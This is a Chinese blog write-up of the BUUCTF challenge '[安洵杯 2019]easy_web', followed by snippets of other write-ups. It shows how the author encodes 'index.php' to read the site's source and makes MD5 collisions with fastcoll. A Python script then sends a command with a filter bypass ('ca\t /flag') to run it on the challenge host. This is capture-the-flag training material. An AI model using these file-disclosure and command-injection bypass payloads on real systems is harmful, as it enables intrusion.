[安洵杯 2019]easy_web

最新推荐文章于 2023-03-02 21:57:02 发布
最新推荐文章于 2023-03-02 21:57:02 发布
阅读量177 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/119256355
版权
[安洵杯 2019]easy_web

在这里插入图片描述看到url出有类似于base的
在这里插入图片描述两次解密之后
在这里插入图片描述盲猜十六进制解密
在这里插入图片描述这样可以查看index.php的内容
先将index.php进行十六进制编码之后base64加密两次

payload: TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

在这里插入图片描述获得源码base64 解密,
在这里插入图片描述
在这里插入图片描述这个地方用MD5强碰撞用fastcoll生成payload

fastcoll_v1.0.0.5.exe 1.txt

在这里插入图片描述在这里插入图片描述然后使用python写脚本发送数据

import urllib
import hashlib

f1 = open('1_msg1.txt','rb').read()
f2 = open('1_msg2.txt','rb').read()

data1 = f1
# data1 = urllib.quote(f1)
print(data1)
data2 = f2
# data2 = urllib.quote(f2)
print(data2)

import requests
# url = 'http://127.0.0.1/buu/mmd5.php'
url = 'http://e959cca5-366b-470e-bcab-fb92656d9b24.node4.buuoj.cn/index.php?img=1&cmd=ca\\t /flag'
data = {
    'a':data1,
    'b':data2
}
r = requests.post(url,data=data)
print(r.text)
# m= hashlib.md5()
# m.update(f1)
# print m.hexdigest()
#
# m.update(f2)
# print m.hexdigest()

得到flag
在这里插入图片描述

[安洵 2019]easy_web - RCE(关键字绕过)+md5强碰撞+逆向思维
oZuoShen123的博客
10-11 1550
1、F12发现提示md5 is funny ~;还有img标签中,有伪协议和base64编码 2、url地址是index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=   这就有意思了,这里的img明显是编码后的数据   但是这里有个坑,也就是考我们的逆向思维,其实解密之后我们并不需要去访问555.png,而是解密得到555.png之后,心理瞬间舒畅了,因为我们知道从555.png -> TXpVek5UTTFNbVUzTURabE5qYz0
[安洵 2019]easy_web 1
plant1234的博客
04-08 1819
首先打开题目得到: 发现url有所不同: img为base64加密,解码后发现还是base64,继续解码,然后是16进制 在解码得到: 发现img可能存在文件包含漏洞: 将index.php按照加密方法加密请求得到: 发现base64编码解码,得到 发现是index.php源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cm
[安洵 2019]easy_web1
qq_44402100的博客
06-09 116
打开网页=》发现俩个参数,并且img参数怎么那么像base64加密的 a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%...
buu做题笔记——[安洵 2019]easy_web
weixin_46330722的博客
11-30 1428
BUU[安洵 2019]easy_web [安洵 2019]easy_web 进入题目就是这样一个页面,先看下源码 这里有一个提示,这题应该跟md5有关,这时我注意到了URL http://60c3d800-d438-4c23-87c2-dbee32a9e363.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= 这个img参数后面应该是个编码后的文件名,然后源码里就会出现base64编码的文件内容 将img参数的值解码
buuctf[安洵]easy_web
m0_61864310的博客
03-02 475
buuctf 安洵easy_web writeup
[安洵 2019] web题-easy_web
BROTHERYY的博客
12-31 1146
嘻嘻 发现url存在base64加密,尝试解密得到了加密规则,解密出来是图片的名字555.png base64->base64->hex TXpVek5UTTFNbVUzTURabE5qYz0->MzUzNTM1MmU3MDZlNjc=->3535352e706e67->555.png 得到了加密规则,将index.php加密抓包得到源码 hex->base64->base64 最后加密完成是:TmprMlJUWTBOalUzT0RKRk56QTJPRGN3 访.
[安洵 2019]easy_serialize_php 1
plant1234的博客
06-03 622
首先打开题目根据提示得到源码: 对代码进行审计 发现我们能利用的点就是: 这文件读取,但我们要读什么呢?根据提示看一下phpinfo发现可以读取的文件: 回到源码继续审计,要利用文件读取必修绕过这个是在extract()对数组赋值之后进行的赋值 我们传入$_SESSION数组可以覆盖前面的值 但是不能覆盖这里img的值发现有过滤字符替换为空: 可以利用字符逃逸 首先构造数组反序列化:可以看到,我们要把function的值溢出来作为数组的值, 就可以通过user的值的长度来把:";s:8:“function
BUUCTF-[安洵 2019]easy_web1
Monica的博客
11-09 1833
题目 分析 页面啥也没有,日常查看源代码 蓝色的东西有一大串,前面写着data:image/gif;base64 知识点: Data URI scheme data:image/png;base64的使用_凉茶微凉-CSDN博客 data:image/png;base64 - 心存善念 - 博客园 目的是将一些小的数据,直接嵌入到网页中,从而不用再从外部文件载入 其实“data:image/gif;base64,R0lGODlhJ……” 就是一张图片的DataURL,就是利用
web buuctf [安洵 2019]easy_web1
weixin_44214568的博客
03-23 1229
考点:md5强类型绕过(字符串) 一定要注意分析题目,要提高敏感 源代码最上面是一大串的base64编码后的文字,应该是左上角图像的编码,(这时候就应该考虑到能不能对index.php进行回显) 1.看链接上面有两个参数,一个是img,一个是file img的值是TXpVek5UTTFNbVUzTURabE5qYz0, 进行base64解码MzUzNTM1MmU3MDZlNjc=; 再进行base64解码3535352e706e67; 16进制转字符串555.png. 同样,对i..
BUUCTF WEB [安洵 2019]easy_web 1 WP
Whaocai的博客
08-02 1571
考点: md5强碰撞 php代码审计–正则表达式 F12看到md5 is funny~ ,猜测与md5算法有关。注意到<img>标签和url地址栏,img参数是文件名的某种加密后的,将读取到的文件内容base64加密之后,输出到img标签中。 这个时候,要想办法知道img参数是怎么加密的,查看wp之后,发现后端会对传进去的img参数先进行两次base64解密,再进行一次hex解密。所以我们在payload时要先进行一次hex加密,再进行两次base64加密 同理然后读取一下index.php,再
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值